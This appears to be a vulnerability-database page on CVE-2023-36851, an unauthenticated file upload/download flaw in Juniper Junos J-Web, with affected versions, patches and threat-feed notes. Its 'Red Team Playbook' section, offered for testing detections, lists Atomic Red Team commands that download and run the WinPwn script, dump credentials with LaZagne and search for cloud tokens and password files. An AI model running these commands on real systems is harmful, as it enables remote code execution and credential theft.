CVE-2023-36851
Overview
This vulnerability is a missing authentication flaw in Juniper Networks Junos OS on SRX Series devices, specifically affecting the J-Web management interface. The root cause is the lack of authentication enforcement on the webauth_operation.php endpoint, which handles file upload and download operations. This allows unauthenticated network-based access to critical file system functions within the affected component.
Vulnerability Description
A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to webauth_operation.php that doesn't require authentication, an attacker is able to upload and download arbitrary files via J-Web, leading to a loss of integrity or confidentiality, which may allow chaining to other vulnerabilities. This issue affects Juniper Networks Junos OS on SRX Series: * 21.2 versions prior to 21.2R3-S8; * 21.4 versions prior to 21.4R3-S6; * 22.1 versions prior to 22.1R3-S5; * 22.2 versions prior to 22.2R3-S3; * 22.3 versions prior to 22.3R3-S2; * 22.4 versions prior to 22,4R2-S2, 22.4R3; * 23.2 versions prior to 23.2R1-S2, 23.2R2.
Impact
An unauthenticated attacker can exploit this vulnerability remotely without any user interaction or credentials to upload or download arbitrary files via the J-Web interface. This can lead to loss of file system integrity or confidentiality, potentially enabling further exploitation or lateral movement within the network. The unauthorized file operations could disrupt device stability or expose sensitive configuration and operational data, impacting the security posture of the affected network infrastructure.
Solution
Juniper Networks has released patches addressing this vulnerability in Junos OS versions 21.2R3-S8, 21.4R3-S6, 22.1R3-S5, 22.2R3-S3, 22.3R3-S2, 22.4R2-S2, 22.4R3, 23.2R1-S2, and 23.2R2. Users should upgrade affected SRX Series devices to these fixed versions as detailed in Juniper advisory JSA72300 available at https://supportportal.juniper.net/JSA72300. No alternative workarounds are specified by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within Juniper Networks' Junos OS, specifically affecting the SRX Series devices. This flaw arises from a lack of authentication for essential functions, particularly within the web authentication operation interface. The vulnerability enables an unauthenticated attacker to interact with the system in a manner that can compromise the integrity of the file system. By exploiting this weakness, attackers can upload and download arbitrary files without requiring any form of authentication, which poses significant risks to the confidentiality and integrity of the system.
The attack vector for this vulnerability is primarily network-based, allowing attackers to target devices remotely. By sending crafted requests to the web authentication operation interface, an attacker can execute file operations that should typically be restricted to authenticated users. This could lead to unauthorized access to sensitive files, modification of system configurations, or even the introduction of malicious payloads. The ability to manipulate files without authentication not only facilitates the immediate exploitation of the device but also sets the stage for chaining with other vulnerabilities, potentially leading to more severe breaches within the network infrastructure.
The real-world implications of this vulnerability are significant, particularly for organizations relying on Juniper's SRX Series for their network security. The ability for an attacker to gain unauthorized access to critical system files can result in data breaches, loss of sensitive information, or disruption of services. Furthermore, the potential for file manipulation could allow attackers to alter security configurations, which may lead to further exploitation of the network. The business risks associated with such incidents include reputational damage, regulatory penalties, and financial losses stemming from remediation efforts and potential downtime.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Junos OS to the latest versions that address this flaw is crucial. Additionally, employing network intrusion detection systems (NIDS) can help identify unusual patterns of traffic that may indicate exploitation attempts. Organizations should also conduct routine security assessments and penetration testing to uncover potential vulnerabilities before they can be exploited by malicious actors. Furthermore, implementing strict access controls and monitoring file integrity can help reduce the risk of unauthorized file operations.
In conclusion, the vulnerability within Juniper Networks' Junos OS on SRX Series devices presents a significant security risk due to its potential for exploitation by unauthenticated attackers. The ability to perform critical file operations without authentication can lead to severe consequences for affected organizations. By adopting proactive detection and mitigation strategies, businesses can better protect their network infrastructure and minimize the risks associated with this vulnerability.
Affected Products (62)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r2-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r2-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s4:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s5:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s6:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r3-s7:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.4 |
cpe:2.3:o:juniper:junos:21.4:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.4 |
cpe:2.3:o:juniper:junos:21.4:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.4 |
cpe:2.3:o:juniper:junos:21.4:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.4 |
cpe:2.3:o:juniper:junos:21.4:r1-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.4 |
cpe:2.3:o:juniper:junos:21.4:r2:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36851 |
| supportportal.juniper.net |
GitHub CVE
vendor-advisory
mitigation
|
https://supportportal.juniper.net/JSA72300 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-36851 |